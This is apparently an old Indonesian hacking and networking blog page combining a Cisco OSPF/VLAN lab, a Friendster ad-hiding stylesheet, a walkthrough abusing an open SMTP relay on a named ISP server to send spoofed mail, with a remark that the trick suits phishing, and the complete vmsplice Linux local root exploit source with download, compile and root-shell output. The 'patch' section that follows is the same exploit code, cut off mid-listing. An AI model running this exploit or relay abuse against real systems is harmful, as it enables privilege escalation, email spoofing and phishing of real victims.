Tuesday, March 11, 2008

OSPF + VLAN

note: here's a photo people asked for, striking a pose :D, miss my friends at snap ui cisco ......




Here are the results of my lab practice from the Cisco course; enjoy. You can configure it in Packet Tracer or the Boson simulator, whichever you prefer.

VLAN – TRUNKING LAB CONFIGURATION





SWITCH CONFIGURATION :

VLAN NAME   PORTS
VLAN 20     9, 10
VLAN 30     17, 18
TRUNK       23, 24
VLAN 1      remaining ports

Port Security: ports 9 and 17

ACCESS-LIST SCENARIO
VLAN 1 (A – B) full access to the servers 50.50.50.50 and 100.100.100.100
VLAN 20 (A – B) permit http access to 50.50.50.50 and telnet to 100.100.100.100
VLAN 30 (A – B) permit telnet access to 50.50.50.50 and http to 100.100.100.100
VLAN 1 (A) may only access VLAN 1 (B) and vice versa
VLAN 2 (A) may only access VLAN 2 (B) and vice versa
VLAN 3 (A) may only access VLAN 3 (B) and vice versa




ROUTER-A CONFIGURATION

router#config terminal
router(config)#hostname ROUTER-A
ROUTER-A(config)#enable secret cisco

ROUTER-A(config)#line vty 0 4
ROUTER-A(config-line)#password cisco
ROUTER-A(config-line)#login
ROUTER-A(config-line)#exit

ROUTER-A(config)#int fa0/0.1
ROUTER-A(config-subif)#encapsulation dot1q 1
ROUTER-A(config-subif)#ip address 150.150.1.1 255.255.255.0
ROUTER-A(config-subif)#ip access-group 101 in
ROUTER-A(config-subif)#no shut
ROUTER-A(config-subif)#exit

ROUTER-A(config)#int fa0/0.2
ROUTER-A(config-subif)#encapsulation dot1q 20
ROUTER-A(config-subif)#ip address 150.150.2.1 255.255.255.0
ROUTER-A(config-subif)#ip access-group 102 in
ROUTER-A(config-subif)#no shut
ROUTER-A(config-subif)#exit

ROUTER-A(config)#int fa0/0.3
ROUTER-A(config-subif)#encapsulation dot1q 30
ROUTER-A(config-subif)#ip address 150.150.3.1 255.255.255.0
ROUTER-A(config-subif)#ip access-group 103 in
ROUTER-A(config-subif)#no shut
ROUTER-A(config-subif)#exit

ROUTER-A(config)#int s0/0
ROUTER-A(config-if)#ip address 150.150.7.13 255.255.255.252
ROUTER-A(config-if)#clockrate 64000 (if DCE type)
ROUTER-A(config-if)#no shutdown
ROUTER-A(config-if)#exit

ROUTER-A(config)#int s0/1
ROUTER-A(config-if)#ip address 150.150.7.6 255.255.255.252
ROUTER-A(config-if)#clockrate 64000 (if DCE type)
ROUTER-A(config-if)#no shutdown
ROUTER-A(config-if)#exit

ROUTER-A(config)#router ospf 1
ROUTER-A(config-router)#network 150.150.1.0 0.0.0.255 area 0
ROUTER-A(config-router)#network 150.150.2.0 0.0.0.255 area 0
ROUTER-A(config-router)#network 150.150.3.0 0.0.0.255 area 0
ROUTER-A(config-router)#network 150.150.7.12 0.0.0.3 area 0
ROUTER-A(config-router)#network 150.150.7.4 0.0.0.3 area 0
ROUTER-A(config-router)#exit

ROUTER-A(config)#access-list 101 permit ip 150.150.1.0 0.0.0.255 host 50.50.50.50
ROUTER-A(config)#access-list 101 permit ip 150.150.1.0 0.0.0.255 host 100.100.100.100
ROUTER-A(config)#access-list 101 permit ip 150.150.1.0 0.0.0.255 150.150.4.0 0.0.0.255

ROUTER-A(config)#access-list 102 permit tcp 150.150.2.0 0.0.0.255 host 50.50.50.50 eq www
ROUTER-A(config)#access-list 102 permit tcp 150.150.2.0 0.0.0.255 host 100.100.100.100 eq telnet
ROUTER-A(config)#access-list 102 permit ip 150.150.2.0 0.0.0.255 150.150.5.0 0.0.0.255

ROUTER-A(config)#access-list 103 permit tcp 150.150.3.0 0.0.0.255 host 50.50.50.50 eq telnet
ROUTER-A(config)#access-list 103 permit tcp 150.150.3.0 0.0.0.255 host 100.100.100.100 eq www
ROUTER-A(config)#access-list 103 permit ip 150.150.3.0 0.0.0.255 150.150.6.0 0.0.0.255



ROUTER-B CONFIGURATION

router#config terminal
router(config)#hostname ROUTER-B
ROUTER-B(config)#enable secret cisco

ROUTER-B(config)#line vty 0 4
ROUTER-B(config-line)#password cisco
ROUTER-B(config-line)#login
ROUTER-B(config-line)#exit

ROUTER-B(config)#int fa0/0.1
ROUTER-B(config-subif)#encapsulation dot1q 1
ROUTER-B(config-subif)#ip address 150.150.4.1 255.255.255.0
ROUTER-B(config-subif)#no shut
ROUTER-B(config-subif)#exit

ROUTER-B(config)#int fa0/0.2
ROUTER-B(config-subif)#encapsulation dot1q 20
ROUTER-B(config-subif)#ip address 150.150.5.1 255.255.255.0
ROUTER-B(config-subif)#no shut
ROUTER-B(config-subif)#exit

ROUTER-B(config)#int fa0/0.3
ROUTER-B(config-subif)#encapsulation dot1q 30
ROUTER-B(config-subif)#ip address 150.150.6.1 255.255.255.0
ROUTER-B(config-subif)#no shut
ROUTER-B(config-subif)#exit

ROUTER-B(config)#int s0/0
ROUTER-B(config-if)#ip address 150.150.7.9 255.255.255.252
ROUTER-B(config-if)#clockrate 64000 (if DCE type)
ROUTER-B(config-if)#no shutdown
ROUTER-B(config-if)#exit

ROUTER-B(config)#int s0/1
ROUTER-B(config-if)#ip address 150.150.7.14 255.255.255.252
ROUTER-B(config-if)#clockrate 64000 (if DCE type)
ROUTER-B(config-if)#no shutdown
ROUTER-B(config-if)#exit

ROUTER-B(config)#router ospf 1
ROUTER-B(config-router)#network 150.150.4.0 0.0.0.255 area 0
ROUTER-B(config-router)#network 150.150.5.0 0.0.0.255 area 0
ROUTER-B(config-router)#network 150.150.6.0 0.0.0.255 area 0
ROUTER-B(config-router)#network 150.150.7.12 0.0.0.3 area 0
ROUTER-B(config-router)#network 150.150.7.8 0.0.0.3 area 0



ROUTER-C CONFIGURATION

router#config terminal
router(config)#hostname ROUTER-C
ROUTER-C(config)#enable secret cisco

ROUTER-C(config)#line vty 0 4
ROUTER-C(config-line)#password cisco
ROUTER-C(config-line)#login
ROUTER-C(config-line)#exit

ROUTER-C(config)#int s0/0
ROUTER-C(config-if)#ip address 150.150.7.5 255.255.255.252
ROUTER-C(config-if)#clockrate 64000 (if DCE type)
ROUTER-C(config-if)#no shutdown
ROUTER-C(config-if)#exit

ROUTER-C(config)#int s0/1
ROUTER-C(config-if)#ip address 150.150.7.10 255.255.255.252
ROUTER-C(config-if)#clockrate 64000 (if DCE type)
ROUTER-C(config-if)#no shutdown
ROUTER-C(config-if)#exit

ROUTER-C(config)#int loopback 0
ROUTER-C(config-if)#ip address 50.50.50.50 255.0.0.0
ROUTER-C(config-if)#no shutdown
ROUTER-C(config-if)#exit

ROUTER-C(config)#int loopback 1
ROUTER-C(config-if)#ip address 100.100.100.100 255.0.0.0
ROUTER-C(config-if)#no shutdown
ROUTER-C(config-if)#exit

ROUTER-C(config)#router ospf 1
ROUTER-C(config-router)#network 150.150.7.12 0.0.0.3 area 0
ROUTER-C(config-router)#network 150.150.7.8 0.0.0.3 area 0
ROUTER-C(config-router)#network 50.0.0.0 0.255.255.255 area 0
ROUTER-C(config-router)#network 100.0.0.0 0.255.255.255 area 0



SWITCH A AND B CONFIGURATION

switch#vlan database
switch(vlan)#vlan 20
switch(vlan)#vlan 30
switch(vlan)#exit

switch#config terminal
switch(config)#enable secret cisco
switch(config)#line vty 0 15
switch(config-line)#password cisco
switch(config-line)#login
switch(config-line)#exit

switch(config)#int fa0/9
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan 20
switch(config-if)#switchport port-security
switch(config-if)#switchport port-security maximum 1
switch(config-if)#switchport port-security violation shutdown
switch(config-if)#exit

switch(config)#int fa0/10
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan 20
switch(config-if)#exit

switch(config)#int fa0/17
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan 30
switch(config-if)#switchport port-security
switch(config-if)#switchport port-security maximum 1
switch(config-if)#switchport port-security violation shutdown
switch(config-if)#exit

switch(config)#int fa0/18
switch(config-if)#switchport mode access
switch(config-if)#switchport access vlan 30
switch(config-if)#exit

switch(config)#int fa0/23
switch(config-if)#switchport mode trunk
switch(config-if)#exit

switch(config)#int fa0/24
switch(config-if)#switchport mode trunk
switch(config-if)#exit

switch(config)#interface vlan 1
switch(config-if)#ip address 150.150.1.2 255.255.255.0 (SWITCH A)
switch(config-if)#ip address 150.150.4.2 255.255.255.0 (SWITCH B)
switch(config-if)#no shut
switch(config-if)#exit

switch(config)#ip default-gateway 150.150.1.1 (SWITCH A)
switch(config)#ip default-gateway 150.150.4.1 (SWITCH B)
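The access-list scenario is easy to get wrong by hand, so here is an added worked example, not part of the original lab write-up: a small Python evaluator for the numbered extended ACL syntax ROUTER-A uses (wildcard masks, `host`, `eq` port keywords, first match wins, implicit deny at the end), run against flows taken from the scenario. The ACL lines are copied from the ROUTER-A configuration; the host addresses in the flows are constructed.

```python
"""Evaluate ROUTER-A's numbered extended access-lists against the scenario flows.

Added example, not part of the original lab. ACL text is copied from the
ROUTER-A configuration; flow endpoints are constructed sample hosts."""
import ipaddress

ROUTER_A_ACLS = """
access-list 101 permit ip 150.150.1.0 0.0.0.255 host 50.50.50.50
access-list 101 permit ip 150.150.1.0 0.0.0.255 host 100.100.100.100
access-list 101 permit ip 150.150.1.0 0.0.0.255 150.150.4.0 0.0.0.255
access-list 102 permit tcp 150.150.2.0 0.0.0.255 host 50.50.50.50 eq www
access-list 102 permit tcp 150.150.2.0 0.0.0.255 host 100.100.100.100 eq telnet
access-list 102 permit ip 150.150.2.0 0.0.0.255 150.150.5.0 0.0.0.255
access-list 103 permit tcp 150.150.3.0 0.0.0.255 host 50.50.50.50 eq telnet
access-list 103 permit tcp 150.150.3.0 0.0.0.255 host 100.100.100.100 eq www
access-list 103 permit ip 150.150.3.0 0.0.0.255 150.150.6.0 0.0.0.255
"""

# IOS port keywords used in the lab; numeric ports are accepted as well.
PORT_NAMES = {"www": 80, "telnet": 23, "ftp": 21, "smtp": 25, "domain": 53}


def _ip(s):
    return int(ipaddress.IPv4Address(s))


def _parse_addr(tokens):
    """Consume one IOS address spec: 'any', 'host A', or 'A WILDCARD'.
    Returns ((base, wildcard), remaining_tokens)."""
    if tokens[0] == "any":
        return (0, 0xFFFFFFFF), tokens[1:]
    if tokens[0] == "host":
        return (_ip(tokens[1]), 0), tokens[2:]
    return (_ip(tokens[0]), _ip(tokens[1])), tokens[2:]


def _addr_match(spec, ip):
    """IOS wildcard semantics: a 1 bit in the wildcard means 'don't care'."""
    base, wildcard = spec
    care = ~wildcard & 0xFFFFFFFF
    return ((_ip(ip) ^ base) & care) == 0


def parse_acls(text):
    """Return {acl_number: [(action, proto, src, dst, dst_port), ...]} in entry order."""
    acls = {}
    for line in text.strip().splitlines():
        t = line.split()
        if len(t) < 5 or t[0] != "access-list":
            continue
        number, action, proto = int(t[1]), t[2], t[3]
        src, rest = _parse_addr(t[4:])
        dst, rest = _parse_addr(rest)
        dst_port = None
        if rest[:1] == ["eq"]:
            dst_port = PORT_NAMES.get(rest[1]) or int(rest[1])
        acls.setdefault(number, []).append((action, proto, src, dst, dst_port))
    return acls


def evaluate(acl, proto, src_ip, dst_ip, dst_port=None):
    """First matching entry wins; no match falls through to the implicit deny."""
    for action, eproto, src, dst, eport in acl:
        if eproto != "ip" and eproto != proto:
            continue
        if not (_addr_match(src, src_ip) and _addr_match(dst, dst_ip)):
            continue
        if eport is not None and eport != dst_port:
            continue
        return action
    return "deny"


# Constructed flows covering the scenario lines: (description, ACL applied on
# the ingress subinterface, protocol, source, destination, destination port).
SCENARIO_FLOWS = [
    ("VLAN20 -> 50.50.50.50 http",   102, "tcp",  "150.150.2.10", "50.50.50.50",  80),
    ("VLAN20 -> 50.50.50.50 telnet", 102, "tcp",  "150.150.2.10", "50.50.50.50",  23),
    ("VLAN20 -> 50.50.50.50 ping",   102, "icmp", "150.150.2.10", "50.50.50.50",  None),
    ("VLAN30 -> 50.50.50.50 telnet", 103, "tcp",  "150.150.3.10", "50.50.50.50",  23),
    ("VLAN1 A -> VLAN1 B ping",      101, "icmp", "150.150.1.10", "150.150.4.10", None),
    ("VLAN1 A -> VLAN20 B ping",     101, "icmp", "150.150.1.10", "150.150.5.10", None),
]


def check_scenario(acls):
    """Map each scenario flow to the verdict of the ACL on its ingress subinterface."""
    return {desc: evaluate(acls[n], proto, s, d, port)
            for desc, n, proto, s, d, port in SCENARIO_FLOWS}


if __name__ == "__main__":
    for desc, verdict in check_scenario(parse_acls(ROUTER_A_ACLS)).items():
        print(f"{verdict:6s} {desc}")
```

Two things the run makes visible: the "and vice versa" half of the scenario is not enforced by the configuration shown, because ROUTER-B applies no `ip access-group` on any subinterface, and the implicit deny also drops ICMP from VLAN 20 and VLAN 30 toward the two loopback servers, so a failing ping from those VLANs is expected rather than a sign of an OSPF problem.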

Remove the Banners on Friendster

This social networking site is the most worldwide one, but as with any site, the more it gets visited the more banners it carries, so we'd better just remove them ... to save bandwidth and make it faster

save this file as hilang.css and upload it to Geocities

/******awal copy*****/
/* hide google ads */
#googleAdFactory.fullwidth{position:absolute;top:-5500px;}

/* remove featured sponsor */

#mainnav div.links a:link, #mainnav div.links a:visited, #mainnav div.links a:active { color:#000000; text-decoration:none; }
#mainnav .left {display:none;}
#mainnav .right {display:none;}
#navdivider {display:none;background:transparent;}
#subnav {display:none;}
#marketing_bg{display:none;background:transparent;}

/* remove search form */
#search {display:none;background:transparent;}
#search form {display:none;background:transparent;}
.banner_ad_fix{display:none;}
#banneradrow, #ads_2_3{display:none;}
#content_14 {
display:none;
}
/**********akhir copy**********/

edit your profile, then enter the following under favorite music:




tested by myself and it works ... have fun trying it


source : http://www.sekuritionline.net/forumsekuriti/viewtopic.php?t=414

Is an Open Relay Dangerous??

here I try to show how an open relay on smtp.telkom.net can be used

is it dangerous .... let's see ....

[root@boc ~]# telnet smtp.telkom.net 25
Trying 10.11.15.37...
Connected to smtp.telkom.net (10.11.15.37).
Escape character is '^]'.
220-out-mta1.plasa.com 76 ESMTP Tue, 11 Mar 2008 13:07:12 +0700.
220-Not for public use. Only registered users and servers allowed.
220 UBE, porn, and abusive content not allowed.
set local_echo
500 unrecognized command
helo smtp.telkom.net
250 out-mta1.plasa.com Hello smtp.telkom.net [10.11.21.200]
mail from : iqbal@iqbal-ganteng.com
500 unrecognized command
mail from: iqbal@iqbal.com
250 OK
rcpt to: just_comp@yahoo.com
250 Accepted
data
354 Enter message, ending with "." on a line by itself
subject: email send
hi disana pakabar.

.

I opened the headers in my email ...

X-Apparently-To: just_comp@yahoo.com via 206.190.39.122; Mon, 10 Mar 2008 23:09:33 -0700
X-Originating-IP: [203.130.196.76]
Return-Path:
Authentication-Results: mta511.mail.mud.yahoo.com from=; domainkeys=neutral (no sig)
Received: from 203.130.196.76 (EHLO out-mta1.plasa.com) (203.130.196.76) by mta511.mail.mud.yahoo.com with SMTP; Mon, 10 Mar 2008 23:09:32 -0700
Received: from HELO smtp.telkom.net by out-mta1.plasa.com 76 with smtp id 1JYxfM-0006vX-AV for just_comp@yahoo.com; Tue, 11 Mar 2008 13:09:23 +0700
Subject: email send
Content-Length: 20

hi disana pakabar.


well, to me it is clearly dangerous ... why? because I can carry out social
engineering against a victim, and a case like this can lead to phishing techniques and so on,
setting traps here and there .... until it succeeds ...

yes, this is what spammers use ...
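Added example, not part of the original post: a Python reader for the Received chain of the message shown above, to see what each relay actually recorded about the sender. The header block is constructed from the post (the addresses the page stripped are left out, and one Received line is folded onto two lines to exercise the unfolding code).

```python
"""Trace the Received chain of a message and report what the relay recorded.

Added example, not part of the original post. RAW_HEADERS is constructed
from the header block shown in the post."""
import re

RAW_HEADERS = """\
X-Apparently-To: just_comp@yahoo.com via 206.190.39.122; Mon, 10 Mar 2008 23:09:33 -0700
X-Originating-IP: [203.130.196.76]
Received: from 203.130.196.76 (EHLO out-mta1.plasa.com) (203.130.196.76)
  by mta511.mail.mud.yahoo.com with SMTP; Mon, 10 Mar 2008 23:09:32 -0700
Received: from HELO smtp.telkom.net by out-mta1.plasa.com 76 with smtp id 1JYxfM-0006vX-AV for just_comp@yahoo.com; Tue, 11 Mar 2008 13:09:23 +0700
Subject: email send
Content-Length: 20
"""

# One hop: "from <name-or-ip> [(EHLO name)] [(a.b.c.d)] ... by <mta>"; the
# "from HELO name by mta" shape (no parentheses) is the one the relay used.
HOP_RE = re.compile(
    r"from\s+(?:HELO\s+|EHLO\s+)?(?P<from>\S+)"
    r"(?:\s+\((?:EHLO|HELO)\s+(?P<helo>[^)\s]+)\))?"
    r"(?:\s+\((?P<ip>\d+\.\d+\.\d+\.\d+)\))?"
    r".*?\bby\s+(?P<by>\S+)"
)


def parse_headers(raw):
    """Split a header block into (name, value) pairs, unfolding continuation lines."""
    headers = []
    for line in raw.splitlines():
        if not line.strip():
            break                      # blank line ends the header section
        if line[0] in " \t" and headers:
            name, value = headers[-1]  # folded continuation of the previous field
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def received_chain(headers):
    """Each MTA prepends its Received line, so reversing the header order
    gives sender-to-recipient order. Returns one dict per parsed hop."""
    hops = []
    for name, value in headers:
        if name.lower() != "received":
            continue
        m = HOP_RE.search(value)
        if m:
            hops.append(m.groupdict())
    return list(reversed(hops))


def analyse(raw):
    """Summarise what the chain reveals about the submitting machine."""
    headers = parse_headers(raw)
    chain = received_chain(headers)
    if not chain:
        return {"hops": 0}
    first, last = chain[0], chain[-1]
    xoip = next((v for n, v in headers if n.lower() == "x-originating-ip"), "")
    m = re.search(r"\d+\.\d+\.\d+\.\d+", xoip)
    return {
        "hops": len(chain),
        # What the submitting client announced in HELO: an unverified string.
        "submitting_helo": first["from"],
        # Whether the relay logged the client's address next to that HELO.
        "submitting_ip_recorded": first["ip"] is not None,
        "relay": first["by"],
        # The address the recipient's MTA saw: the relay's, not the client's.
        "relay_public_ip": last["ip"],
        "x_originating_ip": m.group(0) if m else None,
    }


if __name__ == "__main__":
    for key, value in analyse(RAW_HEADERS).items():
        print(f"{key:24s} {value}")
```

The result is what makes this a problem for the recipient: the envelope sender was accepted without any check, the only record of the submitting machine is the HELO string it chose (here the relay's own name), and the recipient's MTA sees only the relay's public address 203.130.196.76. An MTA that relays for its own network should stamp the connecting client's address into its Received line so that abuse can be traced back past the relay.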

You've Been Caught .......

if you want to find out whether someone who is set to invisible on Yahoo Messenger is online, you can use these links

http://en.xeeber.com/ or
http://invisible.ir

no matter how well someone hides, their true colours show in the end ........ :D

Monday, March 10, 2008

Patching a Leaky Tire

The purpose of this article is to learn how to carry out a local exploit .... and then patch VMSPLICE. vmsplice really surprised me, because with this bug I could run it and get the superuser id; here is the walkthrough ...

I installed BackTrack under the VMware emulator as a test bed.

bt ~ $ uname -a ;id ; w
Linux bt 2.6.21.5 #2 SMP Sat Aug 25 19:01:21 GMT 2007 i686 Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux
uid=1000(iqbal) gid=100(users) groups=100(users)
13:05:42 up 1:48, 2 users, load average: 0.15, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 11:18 1:42m 0.55s 0.55s -bash
iqbal pts/0 192.168.219.1 11:23 1.00s 0.18s 0.02s w

Exploit Source

/*
* jessica_biel_naked_in_my_bed.c
*
* I roll in from the pub and see that Wojta has nothing to do again, damn.
* Rascals, here you have something to play with, until he blabs it all too.
* Anyway, it is old as hell and somewhat broken as well.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remember the original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include <stdio.h>      /* printf, fflush */
#include <stdlib.h>     /* exit, putenv */
#include <string.h>     /* memset, strerror */
#include <errno.h>      /* errno */
#include <malloc.h>
#include <limits.h>     /* ULONG_MAX */
#include <signal.h>     /* signal, SIGPIPE */
#include <unistd.h>     /* getuid, setresuid, execl, syscall */
#include <sys/uio.h>    /* struct iovec */
#include <sys/mman.h>   /* mmap, munmap */
#include <asm/page.h>   /* PAGE_SIZE */
#define __KERNEL__
#include <asm/unistd.h> /* __NR_vmsplice, _syscall4 */

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}

// milw0rm.com [2008-02-09]

bt ~ $ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
--13:16:44-- http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
=> `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23
Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[==================================================================================>] 6,264 23.51K/s

13:16:47 (23.42 KB/s) - `27704.c' saved [6264/6264]

bt ~ $ gcc -o 27704 27704.c
bt ~ $ ./27704
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7da5000 .. 0xb7dd7000
[+] root
bt ~ # id ; uname -s ;w
uid=0(root) gid=0(root) groups=100(users)
Linux
13:17:13 up 2:00, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 11:18 1:54m 0.55s 0.55s -bash
iqbal pts/0 192.168.219.1 11:23 0.00s 0.24s 0.26s sshd: iqbal [priv]

Got Root ......

Patch Source


/*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*/

#define _GNU_SOURCE
#include <stdio.h>      /* printf, fopen, fgets, sscanf, perror */
#include <stdlib.h>     /* exit, EXIT_FAILURE, EXIT_SUCCESS */
#include <string.h>     /* memset, strstr, strerror */
#include <errno.h>      /* errno */
#include <malloc.h>
#include <limits.h>     /* ULONG_MAX */
#include <signal.h>     /* signal, SIGPIPE */
#include <unistd.h>     /* getuid, setresuid, syscall */
#include <fcntl.h>      /* open, O_RDWR */
#include <sys/uio.h>    /* struct iovec */
#include <sys/mman.h>   /* mmap, MAP_SHARED */
#include <asm/page.h>   /* PAGE_SIZE */
#define __KERNEL__
#include <asm/unistd.h> /* __NR_vmsplice, _syscall4 */

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
